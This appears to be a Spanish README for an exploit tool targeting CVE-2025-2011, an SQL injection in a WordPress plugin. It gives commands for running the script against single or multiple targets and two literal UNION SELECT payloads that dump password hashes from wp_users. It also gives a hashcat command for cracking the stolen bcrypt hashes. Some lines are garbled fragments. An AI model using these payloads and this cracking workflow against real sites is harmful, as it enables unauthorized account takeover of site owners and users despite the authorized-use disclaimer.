
Exploit para CVE-2025-2011
Por: X3RX3S Pero orgullosamente saqueado por Ash Wesker que usó GPT con mi código y su banner ;) ver aquí ---> https://github.com/Ashwesker/Blackash-CVE-2025-2011 Incluso puedes ver mi handle en 'su' código -_-'
Propósito: Una herramienta de prueba de concepto para evaluar una vulnerabilidad de inyección SQL (CVE-2025-2011) en sitios WordPress.
Descargo de responsabilidad: Úsela solo en sistemas que posea o para los que tenga permiso explícito por escrito. Las pruebas no autorizadas son ilegales y poco éticas.

-p 1 o -p 2)$2a$, $2b$, $2y$), incluyendo variantes con prefijo $wp$results_<hostname>.txt-m 3200) con un aviso-u) o múltiples objetivos mediante un archivo (-f)requestscoloramaInstalar dependencias:
pip install requests colorama
Opcional (para crackear):
hashcat instalado y disponible en tu PATH (Por defecto es /usr/share/wordlists/rockyou.txt)/usr/share/wordlists/rockyou.txtHacer el script ejecutable (opcional):
chmod +x CVE-2025-2011.py
Objetivo único (payload 1 por defecto):
python3 CVE-2025-2011.py -u https://example.com
Objetivo único (payload 2):
python3 CVE-2025-2011.py -u https://example.com -p 2
Múltiples objetivos desde archivo (una URL por línea):
python3 CVE-2025-2011.py -f targets.txt
Para cada host probado, el script guarda un archivo de resultados:
results_<hostname>.txt
Si se encuentran hashes bcrypt, se guardan en hashes.txt y se te preguntará si deseas crackearlos con Hashcat. Ejemplo de comando Hashcat usado por el script:
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt
Nota: bcrypt es lento por diseño. El crackeo puede llevar mucho tiempo y requerir GPUs.
/wp-admin/admin-ajax.php?action=depicter-lead-index&s=test%27)+UNION+select+user_pass,2,3,4,5+FROM+wp_users--+x
/wp-admin/admin-ajax.php?action=depicter-lead-list&s=test%27))+table_name+UNION+select+user_pass+FROM+wp_users--+x
Esta herramienta se proporciona únicamente con fines educativos y defensivos. No la utilices contra sistemas para los que no tengas permiso explícito. El autor y distribuidor no aceptan responsabilidad alguna por el mal uso. Siempre obtén autorización por escrito antes de realizar pruebas contra objetivos que no poseas.
run_hashcat en el script para que apunte a tu lista preferida.